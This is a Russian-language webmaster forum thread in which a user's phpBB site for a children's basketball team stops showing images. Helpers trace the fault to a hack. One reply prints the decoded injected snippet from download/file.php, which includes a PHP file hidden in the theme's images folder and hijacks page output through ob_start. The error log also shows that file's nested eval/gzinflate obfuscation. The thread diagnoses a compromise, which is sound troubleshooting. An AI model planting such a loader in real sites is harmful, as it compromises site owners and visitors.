просто кросавчег
С нами с 15.11.04
Сообщения: 11768
Рейтинг: 7461
|
 Добавлено: 03/12/12 в 14:14 |
Пообещал тут людям из детской баскетбольной команды сделать для них форум и теперь попал в неприятное положение. Скрипт пхпББ я поставил и все работало нормально, но в один прекрасный момент картинки куда-то подевались. То есть в сообщениях были картинки, а теперь их нет. Аватары пользователей тоже не показываются.
Картинки у меня находятся в каталоге files по настройкам. В данном каталоге как таковых файлов картинок нет. Там лежат файлы типа 54_1d3bbbc2eb6e9db515bb5b8fa2e85614 без расширения. Если их переименовать в file.jpg, то показывается картинка. Возможно это так и надо, но я хз.
Картинки имеют адрес ./download/file.php?id=189&t=1
Ведут они на большую картинку по ссылке download/file.php?id=189&mode=view, вместо которой вижу в ФФ надпись Изображение download/file.php?id=189&mode=view не может быть показано, так как содержит ошибки.
Хрен знает что делать, с скрипте особо не разбираюсь, дети и родители из баскетбольной команды достают. Кто нибудь понимает, в чем дело?
|
|
|
|
| |
С нами с 01.04.07
Сообщения: 4378
Рейтинг: 2970
|
| Добавлено: 03/12/12 в 14:38 |
|
|
|
|
| |
просто кросавчег
С нами с 15.11.04
Сообщения: 11768
Рейтинг: 7461
|
| Добавлено: 03/12/12 в 14:55 |
В логе ошибок с того момента, когда пропали картинки идут следующие ошибки:
| Код: [развернуть] | Ошибка при создании изображения
» Ошибка в [ROOT]/styles/RedSilver/theme/images/512.php(3) : runtime-created function(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code в строке 1: gzinflate() [function.gzinflate]: data error |
По ссылке немного не понял, что там сделали?
Последний раз редактировалось: Pedronas (03/12/12 в 16:38), всего редактировалось 1 раз
|
|
|
|
| |
С нами с 01.04.07
Сообщения: 4378
Рейтинг: 2970
|
| Добавлено: 03/12/12 в 15:01 |
Вообще, я просил результат скачивания картинки по запрросу download/file.php?id=189&mode=view
И нафига весь файл впендюривать?
Но судя по содержимому файла - это взлом. Вставили какой-то сомнительный код. Копай в этом направлении.
Ещё и | Код: | | » Ошибка в [ROOT]/styles/RedSilver/theme/images/512.php |
Пхп файлов в такой папке быть не должно.
Возможно влезли через тему, я так понимаю она сторонняя.
|
|
|
|
| |
просто кросавчег
С нами с 15.11.04
Сообщения: 11768
Рейтинг: 7461
|
| Добавлено: 03/12/12 в 15:58 |
| Код: [развернуть] | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-Strict.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><title>doverennost.jpg</title></head><body><div><img src="./../download/file.php?id=189&sid=d5c1d7756708648d7057fe2f9f229c0c" alt="doverennost.jpg" /></div>
</body></html> |
вот код
и пхп файлов действительно в теме не должно быть
|
|
|
|
| |
С нами с 11.10.12
Сообщения: 428
Рейтинг: 1032
|
| Добавлено: 03/12/12 в 16:06 |
Всё просто. Сайт взломан. Та "закодированная" вставка в начале download/file.php делает вот что
| Код: | if (function_exists('ob_start') && !isset($GLOBALS['mfsn'])) {
$GLOBALS['mfsn'] = '/home/p13878/www/CENSORED/styles/RedSilver/theme/images/512.php';
if (file_exists($GLOBALS['mfsn'])) {
include_once ($GLOBALS['mfsn']);
if (function_exists('gml') && function_exists('dgobh')) {
ob_start('dgobh');
}
}
} |
Т.е. вывод сайта перенаправляется в функцию dgobh из 512.php, которая делает что-то плохое.
Т.к.
| Цитата: | | Всего сообщений: 16 | Тем: 4 | Пользователей: 6 |
,то снеси форум и поставь заново, чистка может занять больше времени, если у тебя нет локального клона или бэкапа
|
|
|
|
apache, bash, css, elasticsearch, ffmpeg, html, js, mysql, mongo, nginx, php; *nix only
|
9
|
|
| |
просто кросавчег
С нами с 15.11.04
Сообщения: 11768
Рейтинг: 7461
|
| Добавлено: 03/12/12 в 16:37 |
спасибо, все снес 
|
|
|
|
| |
Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте! |
